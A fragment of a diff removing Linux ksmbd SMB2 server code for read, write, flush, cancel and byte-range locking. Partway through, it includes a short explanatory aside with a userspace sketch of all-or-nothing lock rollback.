+-	if (length > max_read_size) {
+-		ksmbd_debug(SMB, "limiting read size to max size (%u)\n",
+-			    max_read_size);
+-		err = -EINVAL;
+-		goto out;
+-	}
+-
+-	ksmbd_debug(SMB, "filename %pD, offset %lld, len %zu\n",
+-		    fp->filp, offset, length);
+-
+-	work->aux_payload_buf = kvmalloc(length, GFP_KERNEL | __GFP_ZERO);
+-	if (!work->aux_payload_buf) {
+-		err = -ENOMEM;
+-		goto out;
+-	}
+-
+-	nbytes = ksmbd_vfs_read(work, fp, length, &offset);
+-	if (nbytes < 0) {
+-		err = nbytes;
+-		goto out;
+-	}
+-
+-	if ((nbytes == 0 && length != 0) || nbytes < mincount) {
+-		kvfree(work->aux_payload_buf);
+-		work->aux_payload_buf = NULL;
+-		rsp->hdr.Status = STATUS_END_OF_FILE;
+-		smb2_set_err_rsp(work);
+-		ksmbd_fd_put(work, fp);
+-		return 0;
+-	}
+-
+-	ksmbd_debug(SMB, "nbytes %zu, offset %lld mincount %zu\n",
+-		    nbytes, offset, mincount);
+-
+-	if (is_rdma_channel == true) {
+-		/* write data to the client using rdma channel */
+-		remain_bytes = smb2_read_rdma_channel(work, req,
+-						      work->aux_payload_buf,
+-						      nbytes);
+-		kvfree(work->aux_payload_buf);
+-		work->aux_payload_buf = NULL;
+-
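+-		/* The payload was sent over the RDMA channel, so no in-band data remains */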
+-		nbytes = 0;
+-		if (remain_bytes < 0) {
+-			err = (int)remain_bytes;
+-			goto out;
+-		}
+-	}
+-
+-	rsp->StructureSize = cpu_to_le16(17);
+-	rsp->DataOffset = 80;
+-	rsp->Reserved = 0;
+-	rsp->DataLength = cpu_to_le32(nbytes);
+-	rsp->DataRemaining = cpu_to_le32(remain_bytes);
+-	rsp->Flags = 0;
+-	inc_rfc1001_len(work->response_buf, 16);
+-	work->resp_hdr_sz = get_rfc1002_len(work->response_buf) + 4;
+-	work->aux_payload_sz = nbytes;
+-	inc_rfc1001_len(work->response_buf, nbytes);
+-	ksmbd_fd_put(work, fp);
+-	return 0;
+-
+-out:
+-	if (err) {
+-		if (err == -EISDIR)
+-			rsp->hdr.Status = STATUS_INVALID_DEVICE_REQUEST;
+-		else if (err == -EAGAIN)
+-			rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
+-		else if (err == -ENOENT)
+-			rsp->hdr.Status = STATUS_FILE_CLOSED;
+-		else if (err == -EACCES)
+-			rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-		else if (err == -ESHARE)
+-			rsp->hdr.Status = STATUS_SHARING_VIOLATION;
+-		else if (err == -EINVAL)
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		else
+-			rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-
+-		smb2_set_err_rsp(work);
+-	}
+-	ksmbd_fd_put(work, fp);
+-	return err;
+-}
+-
+-/**
+- * smb2_write_pipe() - handler for smb2 write on IPC pipe
+- * @work:	smb work containing write IPC pipe command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static noinline int smb2_write_pipe(struct ksmbd_work *work)
+-{
+-	struct smb2_write_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_write_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_rpc_command *rpc_resp;
+-	u64 id = 0;
+-	int err = 0, ret = 0;
+-	char *data_buf;
+-	size_t length;
+-
+-	length = le32_to_cpu(req->Length);
+-	id = req->VolatileFileId;
+-
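+-	/* Make sure the write payload lies entirely within the received PDU */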
+-	if ((u64)le16_to_cpu(req->DataOffset) + length >
+-	    get_rfc1002_len(work->request_buf)) {
+-		pr_err("invalid write data offset %u, smb_len %u\n",
+-		       le16_to_cpu(req->DataOffset),
+-		       get_rfc1002_len(work->request_buf));
+-		err = -EINVAL;
+-		goto out;
+-	}
+-
+-	data_buf = (char *)(((char *)&req->hdr.ProtocolId) +
+-			   le16_to_cpu(req->DataOffset));
+-
+-	rpc_resp = ksmbd_rpc_write(work->sess, id, data_buf, length);
+-	if (rpc_resp) {
+-		if (rpc_resp->flags == KSMBD_RPC_ENOTIMPLEMENTED) {
+-			rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-			kvfree(rpc_resp);
+-			smb2_set_err_rsp(work);
+-			return -EOPNOTSUPP;
+-		}
+-		if (rpc_resp->flags != KSMBD_RPC_OK) {
+-			rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-			smb2_set_err_rsp(work);
+-			kvfree(rpc_resp);
+-			return ret;
+-		}
+-		kvfree(rpc_resp);
+-	}
+-
+-	rsp->StructureSize = cpu_to_le16(17);
+-	rsp->DataOffset = 0;
+-	rsp->Reserved = 0;
+-	rsp->DataLength = cpu_to_le32(length);
+-	rsp->DataRemaining = 0;
+-	rsp->Reserved2 = 0;
+-	inc_rfc1001_len(work->response_buf, 16);
+-	return 0;
+-out:
+-	if (err) {
+-		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-		smb2_set_err_rsp(work);
+-	}
+-
+-	return err;
+-}
+-
+-static ssize_t smb2_write_rdma_channel(struct ksmbd_work *work,
+-				       struct smb2_write_req *req,
+-				       struct ksmbd_file *fp,
+-				       loff_t offset, size_t length, bool sync)
+-{
+-	char *data_buf;
+-	int ret;
+-	ssize_t nbytes;
+-
+-	data_buf = kvmalloc(length, GFP_KERNEL | __GFP_ZERO);
+-	if (!data_buf)
+-		return -ENOMEM;
+-
+-	ret = ksmbd_conn_rdma_read(work->conn, data_buf, length,
+-				   (struct smb2_buffer_desc_v1 *)
+-				   ((char *)req + le16_to_cpu(req->WriteChannelInfoOffset)),
+-				   le16_to_cpu(req->WriteChannelInfoLength));
+-	if (ret < 0) {
+-		kvfree(data_buf);
+-		return ret;
+-	}
+-
+-	ret = ksmbd_vfs_write(work, fp, data_buf, length, &offset, sync, &nbytes);
+-	kvfree(data_buf);
+-	if (ret < 0)
+-		return ret;
+-
+-	return nbytes;
+-}
+-
+-/**
+- * smb2_write() - handler for smb2 write to a file
+- * @work:	smb work containing write command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_write(struct ksmbd_work *work)
+-{
+-	struct smb2_write_req *req;
+-	struct smb2_write_rsp *rsp;
+-	struct ksmbd_file *fp = NULL;
+-	loff_t offset;
+-	size_t length;
+-	ssize_t nbytes;
+-	char *data_buf;
+-	bool writethrough = false, is_rdma_channel = false;
+-	int err = 0;
+-	unsigned int max_write_size = work->conn->vals->max_write_size;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (test_share_config_flag(work->tcon->share_conf, KSMBD_SHARE_FLAG_PIPE)) {
+-		ksmbd_debug(SMB, "IPC pipe write request\n");
+-		return smb2_write_pipe(work);
+-	}
+-
+-	offset = le64_to_cpu(req->Offset);
+-	length = le32_to_cpu(req->Length);
+-
+-	if (req->Channel == SMB2_CHANNEL_RDMA_V1 ||
+-	    req->Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE) {
+-		is_rdma_channel = true;
+-		max_write_size = get_smbd_max_read_write_size();
+-		length = le32_to_cpu(req->RemainingBytes);
+-	}
+-
+-	if (is_rdma_channel == true) {
+-		unsigned int ch_offset = le16_to_cpu(req->WriteChannelInfoOffset);
+-
+-		if (req->Length != 0 || req->DataOffset != 0 ||
+-		    ch_offset < offsetof(struct smb2_write_req, Buffer)) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-		err = smb2_set_remote_key_for_rdma(work,
+-						   (struct smb2_buffer_desc_v1 *)
+-						   ((char *)req + ch_offset),
+-						   req->Channel,
+-						   req->WriteChannelInfoLength);
+-		if (err)
+-			goto out;
+-	}
+-
+-	if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-		ksmbd_debug(SMB, "User does not have write permission\n");
+-		err = -EACCES;
+-		goto out;
+-	}
+-
+-	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
+-	if (!fp) {
+-		err = -ENOENT;
+-		goto out;
+-	}
+-
+-	if (!(fp->daccess & (FILE_WRITE_DATA_LE | FILE_READ_ATTRIBUTES_LE))) {
+-		pr_err("Not permitted to write: 0x%x\n", fp->daccess);
+-		err = -EACCES;
+-		goto out;
+-	}
+-
+-	if (length > max_write_size) {
+-		ksmbd_debug(SMB, "limiting write size to max size (%u)\n",
+-			    max_write_size);
+-		err = -EINVAL;
+-		goto out;
+-	}
+-
+-	ksmbd_debug(SMB, "flags %u\n", le32_to_cpu(req->Flags));
+-	if (le32_to_cpu(req->Flags) & SMB2_WRITEFLAG_WRITE_THROUGH)
+-		writethrough = true;
+-
+-	if (is_rdma_channel == false) {
+-		if (le16_to_cpu(req->DataOffset) <
+-		    offsetof(struct smb2_write_req, Buffer)) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-
+-		data_buf = (char *)(((char *)&req->hdr.ProtocolId) +
+-				    le16_to_cpu(req->DataOffset));
+-
+-		ksmbd_debug(SMB, "filename %pD, offset %lld, len %zu\n",
+-			    fp->filp, offset, length);
+-		err = ksmbd_vfs_write(work, fp, data_buf, length, &offset,
+-				      writethrough, &nbytes);
+-		if (err < 0)
+-			goto out;
+-	} else {
+-		/* read data from the client using rdma channel, and
+-		 * write the data.
+-		 */
+-		nbytes = smb2_write_rdma_channel(work, req, fp, offset, length,
+-						 writethrough);
+-		if (nbytes < 0) {
+-			err = (int)nbytes;
+-			goto out;
+-		}
+-	}
+-
+-	rsp->StructureSize = cpu_to_le16(17);
+-	rsp->DataOffset = 0;
+-	rsp->Reserved = 0;
+-	rsp->DataLength = cpu_to_le32(nbytes);
+-	rsp->DataRemaining = 0;
+-	rsp->Reserved2 = 0;
+-	inc_rfc1001_len(work->response_buf, 16);
+-	ksmbd_fd_put(work, fp);
+-	return 0;
+-
+-out:
+-	if (err == -EAGAIN)
+-		rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
+-	else if (err == -ENOSPC || err == -EFBIG)
+-		rsp->hdr.Status = STATUS_DISK_FULL;
+-	else if (err == -ENOENT)
+-		rsp->hdr.Status = STATUS_FILE_CLOSED;
+-	else if (err == -EACCES)
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-	else if (err == -ESHARE)
+-		rsp->hdr.Status = STATUS_SHARING_VIOLATION;
+-	else if (err == -EINVAL)
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-	else
+-		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-
+-	smb2_set_err_rsp(work);
+-	ksmbd_fd_put(work, fp);
+-	return err;
+-}
+-
+-/**
+- * smb2_flush() - handler for smb2 flush file - fsync
+- * @work:	smb work containing flush command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_flush(struct ksmbd_work *work)
+-{
+-	struct smb2_flush_req *req;
+-	struct smb2_flush_rsp *rsp;
+-	int err;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	ksmbd_debug(SMB, "SMB2_FLUSH called for fid %llu\n", req->VolatileFileId);
+-
+-	err = ksmbd_vfs_fsync(work, req->VolatileFileId, req->PersistentFileId);
+-	if (err)
+-		goto out;
+-
+-	rsp->StructureSize = cpu_to_le16(4);
+-	rsp->Reserved = 0;
+-	inc_rfc1001_len(work->response_buf, 4);
+-	return 0;
+-
+-out:
+-	if (err) {
+-		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-		smb2_set_err_rsp(work);
+-	}
+-
+-	return err;
+-}
+-
+-/**
+- * smb2_cancel() - handler for smb2 cancel command
+- * @work:	smb work containing cancel command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_cancel(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
+-	struct smb2_hdr *chdr;
+-	struct ksmbd_work *iter;
+-	struct list_head *command_list;
+-
+-	ksmbd_debug(SMB, "smb2 cancel called on mid %llu, async flags 0x%x\n",
+-		    hdr->MessageId, hdr->Flags);
+-
+-	if (hdr->Flags & SMB2_FLAGS_ASYNC_COMMAND) {
+-		command_list = &conn->async_requests;
+-
+-		spin_lock(&conn->request_lock);
+-		list_for_each_entry(iter, command_list,
+-				    async_request_entry) {
+-			chdr = smb2_get_msg(iter->request_buf);
+-
+-			if (iter->async_id !=
+-			    le64_to_cpu(hdr->Id.AsyncId))
+-				continue;
+-
+-			ksmbd_debug(SMB,
+-				    "smb2 with AsyncId %llu cancelled command = 0x%x\n",
+-				    le64_to_cpu(hdr->Id.AsyncId),
+-				    le16_to_cpu(chdr->Command));
+-			iter->state = KSMBD_WORK_CANCELLED;
+-			if (iter->cancel_fn)
+-				iter->cancel_fn(iter->cancel_argv);
+-			break;
+-		}
+-		spin_unlock(&conn->request_lock);
+-	} else {
+-		command_list = &conn->requests;
+-
+-		spin_lock(&conn->request_lock);
+-		list_for_each_entry(iter, command_list, request_entry) {
+-			chdr = smb2_get_msg(iter->request_buf);
+-
+-			if (chdr->MessageId != hdr->MessageId ||
+-			    iter == work)
+-				continue;
+-
+-			ksmbd_debug(SMB,
+-				    "smb2 with mid %llu cancelled command = 0x%x\n",
+-				    le64_to_cpu(hdr->MessageId),
+-				    le16_to_cpu(chdr->Command));
+-			iter->state = KSMBD_WORK_CANCELLED;
+-			break;
+-		}
+-		spin_unlock(&conn->request_lock);
+-	}
+-
+-	/* The SMB2_CANCEL command itself gets no response */
+-	work->send_no_response = 1;
+-	return 0;
+-}
+-
+-struct file_lock *smb_flock_init(struct file *f)
+-{
+-	struct file_lock *fl;
+-
+-	fl = locks_alloc_lock();
+-	if (!fl)
+-		goto out;
+-
+-	locks_init_lock(fl);
+-
+-	fl->fl_owner = f;
+-	fl->fl_pid = current->tgid;
+-	fl->fl_file = f;
+-	fl->fl_flags = FL_POSIX;
+-	fl->fl_ops = NULL;
+-	fl->fl_lmops = NULL;
+-
+-out:
+-	return fl;
+-}
+-
+-static int smb2_set_flock_flags(struct file_lock *flock, int flags)
+-{
+-	int cmd = -EINVAL;
+-
+-	/* Check for invalid flag combinations in the lock request */
+-	switch (flags) {
+-	case SMB2_LOCKFLAG_SHARED:
+-		ksmbd_debug(SMB, "received shared request\n");
+-		cmd = F_SETLKW;
+-		flock->fl_type = F_RDLCK;
+-		flock->fl_flags |= FL_SLEEP;
+-		break;
+-	case SMB2_LOCKFLAG_EXCLUSIVE:
+-		ksmbd_debug(SMB, "received exclusive request\n");
+-		cmd = F_SETLKW;
+-		flock->fl_type = F_WRLCK;
+-		flock->fl_flags |= FL_SLEEP;
+-		break;
+-	case SMB2_LOCKFLAG_SHARED | SMB2_LOCKFLAG_FAIL_IMMEDIATELY:
+-		ksmbd_debug(SMB,
+-			    "received shared & fail immediately request\n");
+-		cmd = F_SETLK;
+-		flock->fl_type = F_RDLCK;
+-		break;
+-	case SMB2_LOCKFLAG_EXCLUSIVE | SMB2_LOCKFLAG_FAIL_IMMEDIATELY:
+-		ksmbd_debug(SMB,
+-			    "received exclusive & fail immediately request\n");
+-		cmd = F_SETLK;
+-		flock->fl_type = F_WRLCK;
+-		break;
+-	case SMB2_LOCKFLAG_UNLOCK:
+-		ksmbd_debug(SMB, "received unlock request\n");
+-		flock->fl_type = F_UNLCK;
+-		cmd = 0;
+-		break;
+-	}
+-
+-	return cmd;
+-}
+-
+-static struct ksmbd_lock *smb2_lock_init(struct file_lock *flock,
+-					 unsigned int cmd, int flags,
+-					 struct list_head *lock_list)
+-{
+-	struct ksmbd_lock *lock;
+-
+-	lock = kzalloc(sizeof(struct ksmbd_lock), GFP_KERNEL);
+-	if (!lock)
+-		return NULL;
+-
+-	lock->cmd = cmd;
+-	lock->fl = flock;
+-	lock->start = flock->fl_start;
+-	lock->end = flock->fl_end;
+-	lock->flags = flags;
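+-	/* A zero-length range (start == end) gets special zero-byte lock handling */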
+-	if (lock->start == lock->end)
+-		lock->zero_len = 1;
+-	INIT_LIST_HEAD(&lock->clist);
+-	INIT_LIST_HEAD(&lock->flist);
+-	INIT_LIST_HEAD(&lock->llist);
+-	list_add_tail(&lock->llist, lock_list);
+-
+-	return lock;
+-}
+-
+-static void smb2_remove_blocked_lock(void **argv)
+-{
+-	struct file_lock *flock = (struct file_lock *)argv[0];
+-
+-	ksmbd_vfs_posix_lock_unblock(flock);
+-	wake_up(&flock->fl_wait);
+-}
+-
+-static inline bool lock_defer_pending(struct file_lock *fl)
+-{
+-	/* check pending lock waiters */
+-	return waitqueue_active(&fl->fl_wait);
+-}
+-
+-/**
+- * smb2_lock() - handler for smb2 file lock command
+- * @work:	smb work containing lock command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_lock(struct ksmbd_work *work)
+-{
+-	struct smb2_lock_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_lock_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct smb2_lock_element *lock_ele;
+-	struct ksmbd_file *fp = NULL;
+-	struct file_lock *flock = NULL;
+-	struct file *filp = NULL;
+-	int lock_count;
+-	int flags = 0;
+-	int cmd = 0;
+-	int err = -EIO, i, rc = 0;
+-	u64 lock_start, lock_length;
+-	struct ksmbd_lock *smb_lock = NULL, *cmp_lock, *tmp, *tmp2;
+-	struct ksmbd_conn *conn;
+-	int nolock = 0;
+-	LIST_HEAD(lock_list);
+-	LIST_HEAD(rollback_list);
+-	int prior_lock = 0;
+-
+-	ksmbd_debug(SMB, "Received lock request\n");
+-	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
+-	if (!fp) {
+-		ksmbd_debug(SMB, "Invalid file id for lock: %llu\n", req->VolatileFileId);
+-		err = -ENOENT;
+-		goto out2;
+-	}
+-
+-	filp = fp->filp;
+-	lock_count = le16_to_cpu(req->LockCount);
+-	lock_ele = req->locks;
+-
+-	ksmbd_debug(SMB, "lock count is %d\n", lock_count);
+-	if (!lock_count) {
+-		err = -EINVAL;
+-		goto out2;
+-	}
+-
+-	for (i = 0; i < lock_count; i++) {
+-		flags = le32_to_cpu(lock_ele[i].Flags);
+-
+-		flock = smb_flock_init(filp);
+-		if (!flock)
+-			goto out;
+-
+-		cmd = smb2_set_flock_flags(flock, flags);
+-
+-		lock_start = le64_to_cpu(lock_ele[i].Offset);
+-		lock_length = le64_to_cpu(lock_ele[i].Length);
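+-		/* Reject ranges whose start + length would overflow u64 */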
+-		if (lock_start > U64_MAX - lock_length) {
+-			pr_err("Invalid lock range requested\n");
+-			rsp->hdr.Status = STATUS_INVALID_LOCK_RANGE;
+-			goto out;
+-		}
+-
+-		if (lock_start > OFFSET_MAX)
+-			flock->fl_start = OFFSET_MAX;
+-		else
+-			flock->fl_start = lock_start;
+-
+-		lock_length = le64_to_cpu(lock_ele[i].Length);
+-		if (lock_length > OFFSET_MAX - flock->fl_start)
+-			lock_length = OFFSET_MAX - flock->fl_start;
+-
+-		flock->fl_end = flock->fl_start + lock_length;
+-
+-		if (flock->fl_end < flock->fl_start) {
+-			ksmbd_debug(SMB,
+-				    "the end offset(%llx) is smaller than the start offset(%llx)\n",
+-				    flock->fl_end, flock->fl_start);
+-			rsp->hdr.Status = STATUS_INVALID_LOCK_RANGE;
+-			goto out;
+-		}
+-
+-		/* Check conflict locks in one request */
+-		list_for_each_entry(cmp_lock, &lock_list, llist) {
+-			if (cmp_lock->fl->fl_start <= flock->fl_start &&
+-			    cmp_lock->fl->fl_end >= flock->fl_end) {
+-				if (cmp_lock->fl->fl_type != F_UNLCK &&
+-				    flock->fl_type != F_UNLCK) {
+-					pr_err("two conflicting locks in one request\n");
+-					err = -EINVAL;
+-					goto out;
+-				}
+-			}
+-		}
+-
+-		smb_lock = smb2_lock_init(flock, cmd, flags, &lock_list);
+-		if (!smb_lock) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-	}
+-
+-	list_for_each_entry_safe(smb_lock, tmp, &lock_list, llist) {
+-		if (smb_lock->cmd < 0) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-
+-		if (!(smb_lock->flags & SMB2_LOCKFLAG_MASK)) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-
+-		if ((prior_lock & (SMB2_LOCKFLAG_EXCLUSIVE | SMB2_LOCKFLAG_SHARED) &&
+-		     smb_lock->flags & SMB2_LOCKFLAG_UNLOCK) ||
+-		    (prior_lock == SMB2_LOCKFLAG_UNLOCK &&
+-		     !(smb_lock->flags & SMB2_LOCKFLAG_UNLOCK))) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-
+-		prior_lock = smb_lock->flags;
+-
+-		if (!(smb_lock->flags & SMB2_LOCKFLAG_UNLOCK) &&
+-		    !(smb_lock->flags & SMB2_LOCKFLAG_FAIL_IMMEDIATELY))
+-			goto no_check_cl;
+-
+-		nolock = 1;
+-		/* check locks in connection list */
+-		down_read(&conn_list_lock);
+-		list_for_each_entry(conn, &conn_list, conns_list) {
+-			spin_lock(&conn->llist_lock);
+-			list_for_each_entry_safe(cmp_lock, tmp2, &conn->lock_list, clist) {
+-				if (file_inode(cmp_lock->fl->fl_file) !=
+-				    file_inode(smb_lock->fl->fl_file))
+-					continue;
+-
+-				if (smb_lock->fl->fl_type == F_UNLCK) {
+-					if (cmp_lock->fl->fl_file == smb_lock->fl->fl_file &&
+-					    cmp_lock->start == smb_lock->start &&
+-					    cmp_lock->end == smb_lock->end &&
+-					    !lock_defer_pending(cmp_lock->fl)) {
+-						nolock = 0;
+-						list_del(&cmp_lock->flist);
+-						list_del(&cmp_lock->clist);
+-						spin_unlock(&conn->llist_lock);
+-						up_read(&conn_list_lock);
+-
+-						locks_free_lock(cmp_lock->fl);
+-						kfree(cmp_lock);
+-						goto out_check_cl;
+-					}
+-					continue;
+-				}
+-
+-				if (cmp_lock->fl->fl_file == smb_lock->fl->fl_file) {
+-					if (smb_lock->flags & SMB2_LOCKFLAG_SHARED)
+-						continue;
+-				} else {
+-					if (cmp_lock->flags & SMB2_LOCKFLAG_SHARED)
+-						continue;
+-				}
+-
+-				/* check zero byte lock range */
+-				if (cmp_lock->zero_len && !smb_lock->zero_len &&
+-				    cmp_lock->start > smb_lock->start &&
+-				    cmp_lock->start < smb_lock->end) {
+-					spin_unlock(&conn->llist_lock);
+-					up_read(&conn_list_lock);
+-					pr_err("previous lock conflicts with zero-byte lock range\n");
+-					goto out;
+-				}
+-
+-				if (smb_lock->zero_len && !cmp_lock->zero_len &&
+-				    smb_lock->start > cmp_lock->start &&
+-				    smb_lock->start < cmp_lock->end) {
+-					spin_unlock(&conn->llist_lock);
+-					up_read(&conn_list_lock);
+-					pr_err("current lock conflicts with zero-byte lock range\n");
+-					goto out;
+-				}
+-
+-				if (((cmp_lock->start <= smb_lock->start &&
+-				      cmp_lock->end > smb_lock->start) ||
+-				     (cmp_lock->start < smb_lock->end &&
+-				      cmp_lock->end >= smb_lock->end)) &&
+-				    !cmp_lock->zero_len && !smb_lock->zero_len) {
+-					spin_unlock(&conn->llist_lock);
+-					up_read(&conn_list_lock);
+-					pr_err("lock operation not allowed on an exclusive lock range\n");
+-					goto out;
+-				}
+-			}
+-			spin_unlock(&conn->llist_lock);
+-		}
+-		up_read(&conn_list_lock);
+-out_check_cl:
+-		if (smb_lock->fl->fl_type == F_UNLCK && nolock) {
+-			pr_err("attempt to unlock an unlocked range\n");
+-			rsp->hdr.Status = STATUS_RANGE_NOT_LOCKED;
+-			goto out;
+-		}
+-
+-no_check_cl:
+-		if (smb_lock->zero_len) {
+-			err = 0;
+-			goto skip;
+-		}
+-
+-		flock = smb_lock->fl;
+-		list_del(&smb_lock->llist);
+-retry:
+-		rc = vfs_lock_file(filp, smb_lock->cmd, flock, NULL);
+-skip:
+-		if (flags & SMB2_LOCKFLAG_UNLOCK) {
+-			if (!rc) {
+-				ksmbd_debug(SMB, "File unlocked\n");
+-			} else if (rc == -ENOENT) {
+-				rsp->hdr.Status = STATUS_NOT_LOCKED;
+-				goto out;
+-			}
+-			locks_free_lock(flock);
+-			kfree(smb_lock);
+-		} else {
+-			if (rc == FILE_LOCK_DEFERRED) {
+-				void **argv;
+-
+-				ksmbd_debug(SMB,
+-					    "would have to wait to acquire the lock\n");
+-				spin_lock(&work->conn->llist_lock);
+-				list_add_tail(&smb_lock->clist,
+-					      &work->conn->lock_list);
+-				spin_unlock(&work->conn->llist_lock);
+-				list_add(&smb_lock->llist, &rollback_list);
+-
+-				argv = kmalloc(sizeof(void *), GFP_KERNEL);
+-				if (!argv) {
+-					err = -ENOMEM;
+-					goto out;
+-				}
+-				argv[0] = flock;
+-
+-				rc = setup_async_work(work,
+-						      smb2_remove_blocked_lock,
+-						      argv);
+-				if (rc) {
+-					err = -ENOMEM;
+-					goto out;
+-				}
+-				spin_lock(&fp->f_lock);
+-				list_add(&work->fp_entry, &fp->blocked_works);
+-				spin_unlock(&fp->f_lock);
+-
+-				smb2_send_interim_resp(work, STATUS_PENDING);
+-
+-				ksmbd_vfs_posix_lock_wait(flock);
+-
+-				spin_lock(&work->conn->request_lock);
+-				spin_lock(&fp->f_lock);
+-				list_del(&work->fp_entry);
+-				work->cancel_fn = NULL;
+-				kfree(argv);
+-				spin_unlock(&fp->f_lock);
+-				spin_unlock(&work->conn->request_lock);
+-
+-				if (work->state != KSMBD_WORK_ACTIVE) {
+-					list_del(&smb_lock->llist);
+-					spin_lock(&work->conn->llist_lock);
+-					list_del(&smb_lock->clist);
+-					spin_unlock(&work->conn->llist_lock);
+-					locks_free_lock(flock);
+-
+-					if (work->state == KSMBD_WORK_CANCELLED) {
+-						rsp->hdr.Status =
+-							STATUS_CANCELLED;
+-						kfree(smb_lock);
+-						smb2_send_interim_resp(work,
+-								       STATUS_CANCELLED);
+-						work->send_no_response = 1;
+-						goto out;
+-					}
+-					init_smb2_rsp_hdr(work);
+-					smb2_set_err_rsp(work);
+-					rsp->hdr.Status =
+-						STATUS_RANGE_NOT_LOCKED;
+-					kfree(smb_lock);
+-					goto out2;
+-				}
+-
+-				list_del(&smb_lock->llist);
+-				spin_lock(&work->conn->llist_lock);
+-				list_del(&smb_lock->clist);
+-				spin_unlock(&work->conn->llist_lock);
+-
+-				goto retry;
+-			} else if (!rc) {
+-				spin_lock(&work->conn->llist_lock);
+-				list_add_tail(&smb_lock->clist,
+-					      &work->conn->lock_list);
+-				list_add_tail(&smb_lock->flist,
+-					      &fp->lock_list);
+-				spin_unlock(&work->conn->llist_lock);
+-				list_add(&smb_lock->llist, &rollback_list);
+-				ksmbd_debug(SMB, "successful in taking lock\n");
+-			} else {
+-				goto out;
+-			}
+-		}
+-	}
+-
+-	if (atomic_read(&fp->f_ci->op_count) > 1)
+-		smb_break_all_oplock(work, fp);
+-
+-	rsp->StructureSize = cpu_to_le16(4);
+-	ksmbd_debug(SMB, "successful in taking lock\n");
+-	rsp->hdr.Status = STATUS_SUCCESS;
+-	rsp->Reserved = 0;
+-	inc_rfc1001_len(work->response_buf, 4);
+-	ksmbd_fd_put(work, fp);
+-	return 0;
+-
+-out:
+-	list_for_each_entry_safe(smb_lock, tmp, &lock_list, llist) {
+-		locks_free_lock(smb_lock->fl);
+-		list_del(&smb_lock->llist);
+-		kfree(smb_lock);
+-	}
+-
+-	list_for_each_entry_safe(smb_lock, tmp, &rollback_list, llist) {
+-		struct file_lock *rlock = NULL;
+-
+-		rlock = smb_flock_init(filp);
+-		rlock->fl_type = F_UNLCK;
+-		rlock->fl_start = smb_lock->start;
+-		rlock->fl_end = smb_lock->end;
+-
+-		rc = vfs_lock_file(filp, 0, rlock, NULL);
+-		if (rc)
+-			pr_err("rollback unlock failed: %d\n", rc);
+-
+-		list_del(&smb_lock->llist);
+-		spin_lock(&work->conn->llist_lock);
+-		if (!list_empty(&smb_lock->flist))
+-			list_del(&smb_lock->flist);
+-		list_del(&smb_lock->clist);
+-		spin_unlock(&work->conn->llist_lock);
+-
+-		locks_free_lock(smb_lock->fl);
+-		locks_free_lock(rlock);
+-		kfree(smb_lock);
+-	}
+-out2:
+-	ksmbd_debug(SMB, "failed in taking lock(flags : %x), err : %d\n", flags, err);
+-
+-	if (!rsp->hdr.Status) {
+-		if (err == -EINVAL)
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		else if (err == -ENOMEM)
+-			rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
+-		else if (err == -ENOENT)
+-			rsp->hdr.Status = STATUS_FILE_CLOSED;
+-		else
+-			rsp->hdr.Status = STATUS_LOCK_NOT_GRANTED;
+-	}
+-
+-	smb2_set_err_rsp(work);
+-	ksmbd_fd_put(work, fp);
+-	return err;
+-}
+-
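On failure, the handler above walks rollback_list and issues a matching F_UNLCK for every range it had already granted, so a partially applied lock request never leaves server state behind. As a rough userspace analogue of that all-or-nothing pattern (hypothetical names, Linux OFD record locks standing in for vfs_lock_file()):

/* Hypothetical userspace sketch of the all-or-nothing locking above. */
#define _GNU_SOURCE		/* F_OFD_SETLK */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

struct range { off_t start, len; };

static int lock_all_or_nothing(int fd, const struct range *r, int n)
{
	struct flock fl = { .l_whence = SEEK_SET };
	int i, j;

	for (i = 0; i < n; i++) {
		fl.l_type = F_WRLCK;
		fl.l_start = r[i].start;
		fl.l_len = r[i].len;
		if (fcntl(fd, F_OFD_SETLK, &fl) < 0) {
			/* rollback: release everything taken so far */
			for (j = 0; j < i; j++) {
				fl.l_type = F_UNLCK;
				fl.l_start = r[j].start;
				fl.l_len = r[j].len;
				if (fcntl(fd, F_OFD_SETLK, &fl) < 0)
					perror("rollback unlock failed");
			}
			return -1;
		}
	}
	return 0;	/* all ranges locked */
}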
+-static int fsctl_copychunk(struct ksmbd_work *work,
+-			   struct copychunk_ioctl_req *ci_req,
+-			   unsigned int cnt_code,
+-			   unsigned int input_count,
